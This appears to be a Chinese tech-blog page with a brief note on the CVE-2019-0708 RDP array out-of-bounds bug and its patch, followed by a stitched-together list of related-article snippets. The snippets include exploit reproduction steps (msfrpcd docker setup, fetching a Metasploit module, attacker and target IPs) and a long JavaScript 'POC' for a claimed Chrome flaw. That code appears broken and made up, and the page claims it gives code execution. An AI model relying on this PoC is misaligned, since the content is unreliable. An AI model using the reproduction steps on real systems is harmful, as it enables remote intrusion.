关于CVE-2019-0708 - 数组越界

最新推荐文章于 2025-06-23 10:38:07 发布
原创 最新推荐文章于 2025-06-23 10:38:07 发布 · 419 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#漏洞

博客指出数组赋值时索引未做检查,可通过修改传入参数给任意地址赋值。经bindiff比较,更新补丁对参数进行了检查,解决了该潜在漏洞。

给数组赋值的索引没有做检查,可以修改传入的参数a2, a3给设计好任意的地址赋值
在这里插入图片描述
bindiff比较发现更新补丁做了参数检查
在这里插入图片描述

CVE-2019-0708(远程桌面服务RCE)漏洞复现
sucker的博客
10-29 2110
存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行。该漏洞的触发无需任何用户交互操作,这就意味着,存在漏洞的计算机只要联网,无需任何操作,就有可能遭遇黑客远程攻击,运行恶意代码等,极具破坏性!1,win7设置为NAT模式,并记录其MAC地址。
Docker启动msfrpcd服务并使用Python复现CVE-2019-0708
jstang的博客
04-15 4311
本机 目标 192.168.1.100 192.168.1.200 Linux Windows 7 1、docker启动msfrpcd docker run -itd --name msfrpcd -p 55553:55553 -p 4000-4444:4000-4444 jstang/msfrpcd:1.0 2、Python复现CVE-2019-0708 >>> client = MsfRpcClient("123456", server="192.168.1....
CVE-2019-0708-ExpLoit.zip
05-15
CVE-2019-0708-exploit,针对远程桌面服务(以前称为终端服务)的关键远程执行代码漏洞CVE-2019-0708,以下是Windows版利用工具,以及python版利用工具
CVE-2019-0708 微软补丁更新
热门推荐
似水无痕
05-17 2万+
微软公司于美国当地时间2019年5月14日发布重要安全公告,其操作系统远程桌面(Remote Desktop Services),俗称的3389服务存在严重安全漏洞(编号CVE-2019-0708):攻击者在没有任何授权的情况下(不需要用户名和密码),可以远程直接攻击操作系统开放的3389服务,在受害主机上执行恶意攻击行为,包括安装后门,查看、篡改隐私数据,创建拥有完全用户权限的新账户,影响范围从...
CVE-2019-0708
qq_46487664的博客
03-22 3043
windows经典历史漏洞CVE-2019-0708
cve-2019-15666 xfrm_policy
inquisiter
09-09 1195
这个漏洞比较强,官方说明漏洞只会导致拒绝服务攻击,但实际上利用得当可以实现提权。影响范围3.x-5.x 漏洞成因,数组越界。需要需要插入用户定义的 index timer set。 XFRM_MSG_NEWSA请求的路劲添加policy。 添加policy需要通过verify_newpolicy_info的认证。但漏洞版本认证缺陷。 https://duasynt.com/blog/ubuntu-centos-redhat-privesc --- a/net/xfrm/xfrm_user.c +++ b/n
Nginx CVE-2017-7529数组越界读取缓存漏洞
qq_43665434的博客
05-18 449
Nginx CVE-2017-7529数组越界读取缓存漏洞 漏洞原理:传送门 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 windows10 攻击机 192.168.1.120 实验过程 启动漏洞靶机centos8 # 进入vulhub目录 cd /usr/sbin/vulhub/CVE-2017-7529/ # 开启docker服务 service docker start # 创建docker镜像 docker-compose build #
CVE-2024-4761 Chrome 的 JavaScript 引擎 V8 中的“越界写入”缺陷
黑剑
05-14 2152
通过构建一个包含大量属性的对象并将其分配给 WebAssembly 数组,可以测试 V8 的内存边界检查是否有缺陷。将一个具有大量属性的对象赋值给一个 WebAssembly 数组,这种操作在 V8 引擎内部可能导致内存管理或边界检查失效,进而触发越界漏洞CVE-2024-4761 是一个在 V8 引擎中发现的越界漏洞,报告日期为 2024-05-09。接受一个整数参数,创建一个新的 WebAssembly 数组并返回一个外部引用。创建一个新的 WebAssembly 模块,并定义一个整数数组类型。
Redis 缓冲区溢出漏洞CVE-2024-31449)CPE 高危安装最新redis8.X版本
最新发布
冰恋云的专栏
06-23 1369
1. firewall-cmd --zone=public --list-ports ##查看已开放的端口。Redis Labs Redis整数溢出漏洞CVE-2021-32762)Redis Labs Redis整数溢出漏洞CVE-2021-41099)Redis Labs Redis整数溢出漏洞CVE-2021-32687)Redis Labs Redis整数溢出漏洞CVE-2021-32628)Redis Labs Redis整数溢出漏洞CVE-2021-32627)
精选资源
CVE-2021-1727
03-04
- **进行边界检查**:在处理数组和缓冲区时,始终检查索引是否越界- **使用安全的库函数**:例如,使用 `std::string` 替代原始字符数组,使用 `std::memcpy` 而不是 `std::strcpy`。 - **进行代码审查**:定期...
CVE-2019-0708-POC.py
05-27
网上搜集的poc,不知道是哪些版本Windows的能测出来。
CVE-2019-0708-Poc.rar
05-23
CVE-2019-0708 POC,检测工具 C:. │ cve_2019_0708.rb │ Dockerfile │ LICENSE │ list.txt │ README.md │ screenshot.png │ 使用说明.txt │ ├─docker │ entrypoint.sh │ setup.sh │ └─rdesktop-fork-bd6aa6acddf0ba640a49834807872f4cc0d0a773 │ .cvsignore │ asn.c │ bitmap.c │ bootstrap │ cache.c │ channels.c │ cliprdr.c │ config.guess │ config.sub │ configure.ac │ constants.h │ COPYING │ cssp.c │ ctrl.c │ disk.c │ disk.h │ ewmhints.c │ genauthors │ indent-all.sh │ install-sh │ iso.c │ licence.c │ lspci.c │ Makefile.in │ mcs.c │ mppc.c │ mst120.c │ orders.c │ orders.h │ parallel.c │ parse.h │ printer.c │ printercache.c │ proto.h │ proto.head │ proto.tail │ pstcache.c │ rdesktop │ rdesktop.c │ rdesktop.h │ rdesktop.spec │ rdp.c │ rdp5.c │ rdpdr.c │ rdpsnd.c │ rdpsnd.h │ rdpsnd_alsa.c │ rdpsnd_dsp.c │ rdpsnd_dsp.h │ rdpsnd_libao.c │ rdpsnd_oss.c │ rdpsnd_sgi.c │ rdpsnd_sun.c │ README │ scancodes.h │ scard.c │ scard.h │ seamless.c │ seamless.h │ secure.c │ serial.c │ ssl.c │ ssl.h │ tcp.c │ types.h │ utils.c │ xclip.c │ xkeymap.c │ xproto.h │ xwin.c │ ├─doc │ AUTHORS │ ChangeLog │ ctrl.txt │ HACKING │ ipv6.txt │ keymap-names.txt │ keymapping.txt │ keynums.png │ licensing.txt │ lspci-channel.txt │ makerelease.txt │ patches.txt │ rdesktop.1 │ rdpsnd-rec.txt │ rdpsnd.txt │ redirection.txt │ seamlessrdp-channel.txt │ TODO │ ├─keymaps │ ar │ common │ convert-map │ cs │ da │ de │ de-ch │ en-dv │ en-gb │ en-us │ en-us-intl │ es │ et │ fi │ fo │ fr │ fr-be │ fr-bepo │ fr-ca │ fr-ch │ he │ hr │ hu │ is │ it │ ja │ ko │ lt │ lv │ mk │ modifiers │ nl │ nl-be │ no │ pl │ pt │ pt-br │ ru │ sk │ sl │ sv │ th │ tr │ ├─tests │ brushtest.c │ brushtestMakefile │ notepadbehindwordpad.c │ ├─uiports │ makefile_nanox │ makefile_qt │ makefile_qte │ makefile_svga │ makefile_xxx │ nanoxreadme.txt │ nanoxwin.c │ qtereadme.txt │ qtewin.cpp │ qtewin.h │ qtreadme.txt │ qtwin.cpp │ qtwin.h │ readme.txt │ svgareadme.txt │ svgawin.c │ xxxwin.c │ └─vnc vnc.c vnc.h x11stubs.c x11stubs.h
cve-2019-0708-POC.zip
05-21
CVE-2019-0708CVE-2019-0708CVE-2019-0708CVE-2019-0708 该工具是poc,测试可用,内涵截图!!!
cve-2019-0708-poc-exp.zip
05-20
从github 上搞到的, 测试主机:win10,python。 目标:win7,2008 都测试通过了。 cve-2019-0708.1.py IP地址即可。 啥东西不多说
cve-2019-0708
weixin_43741181的博客
09-23 289
1.复现环境:kali :192.168.174.133 win7:192.168.174.132 下载文件。 wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core...
[漏洞复现]CVE-2019-0708
网络安全知识分享
03-05 5041
CVE-2019-0708复现一、远程桌面连接二、kali系统还原漏洞 一、远程桌面连接 首先,我们要设置远程连接 在控制面板中,搜索“远程设置”->“远程”,勾选“允许远程协助连接这台计算机”和“仅允许运行使用网络级别身份验证的远程桌面的计算机联机”,然后点击“应用”。 下一步,查看Win7的IP地址,CMD中输入指令ipconfig 接着打开远程控制的电脑Win10系统,在运行中输入“mstsc”。 输入刚才得知的Win7 IP地址 是 下一步的弹窗会要求输入账户和密码,点击确定(或者保存密码
CVE-2019-0708:无授权远程代码执行漏洞的智能防御工具
gitblog_00042的博客
06-20 568
CVE-2019-0708:无授权远程代码执行漏洞的智能防御工具 去发现同类优质开源项目:https://gitcode.com/ 在网络安全领域,预防总是胜于治疗。这就是为什么 CVE-2019-0708 这个著名的漏洞如此重要的原因。它是一个针对Remote Desktop Services(以前称为Terminal Services)的远程代码执行漏洞,允许未经身份验证的攻击者通过发送特殊构...
CVE-2019-0708(远程桌面服务RCE)漏洞复现(超详细Getshell)
unlash的博客
10-28 1万+
CVE-2019-0708(远程桌面服务RCE)漏洞复现(超详细Getshell) 漏洞介绍 漏洞修复 复现条件
cve-2019-6518编写poc
05-25
CVE-2019-6518是Chrome浏览器的一个漏洞,攻击者可以通过该漏洞在用户计算机上执行任意代码。这个漏洞在Chrome 72之前的版本中存在。 以下是一个简单的POC: ```html <!DOCTYPE html> <html> <head> <title>CVE-2019-6518 POC</title> </head> <body> <script> var spray = new Array(); var i = 0; for (; i < 0x100; i++) { spray[i] = new Uint32Array(0x1000); } var oobArray = new Array(1); var maxSizeInDouble = 0x7fffffff; oobArray[0] = 0.1; var maxSizeInInt = new Int64(maxSizeInDouble); var idx = 0; var victim = null; function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } } function spray_dv() { var dv = new DataView(new ArrayBuffer(8)); var o = {a: 0}; var array = [o, 0.1, o]; var unboxed = new Array(0x1000).fill(0.1); var boxed = [{}]; boxed[0]['a'] = {}; boxed[0]['a']['b'] = 1.1; boxed[0]['c'] = unboxed; var maxInt = 0x7ffffff0; var minInt = 0x01000000; var kMaxNumIter = 100000; for (var k = 0; k < kMaxNumIter; k++) { var idx = ((maxInt - minInt) * Math.random()) + minInt; dv.setInt32(0, idx, true); var num = dv.getFloat64(0, true); if ((num >= 0x01000000 && num <= 0x7fffffff) || (num >= -0x80000000 && num < -0x7ffffff0) || (num >= -0x100000000 && num < -0xfffffffe)) { return; } } } function trigger() { var o = {a: 1.2}; var arr = [o, 0.1, o]; var n = arr.length - 1; var idx = 0x7ffffff0; var dv = new DataView(new ArrayBuffer(8)); var unboxed = new Array(0x1000).fill(0.1); var boxed = [{}]; boxed[0]['a'] = {}; boxed[0]['a']['b'] = 1.1; boxed[0]['c'] = unboxed; var maxInt = 0x7ffffff0; var minInt = 0x01000000; var kMaxNumIter = 100000; for (var k = 0; k < kMaxNumIter; k++) { var idx = ((maxInt - minInt) * Math.random()) + minInt; dv.setInt32(0, idx, true); var num = dv.getFloat64(0, true); if ((num >= 0x01000000 && num <= 0x7fffffff) || (num >= -0x80000000 && num < -0x7ffffff0) || (num >= -0x100000000 && num < -0xfffffffe)) { break; } } arr[n] = victim; } function corrupt() { gc(); spray_dv(); oobArray[0] = 1.1; victim = oobArray[0]; for (i = 0; i < 10000; i++) { trigger(); } alert(victim); } corrupt(); </script> </body> </html> ``` 该POC利用了Chrome中的数组越界漏洞,通过这个漏洞可以读写到数组之外的内存,从而达到任意代码执行的目的。请注意,这个POC只是一个演示,如果您想在实际环境中使用它,请务必小心,因为它可能会导致严重的安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值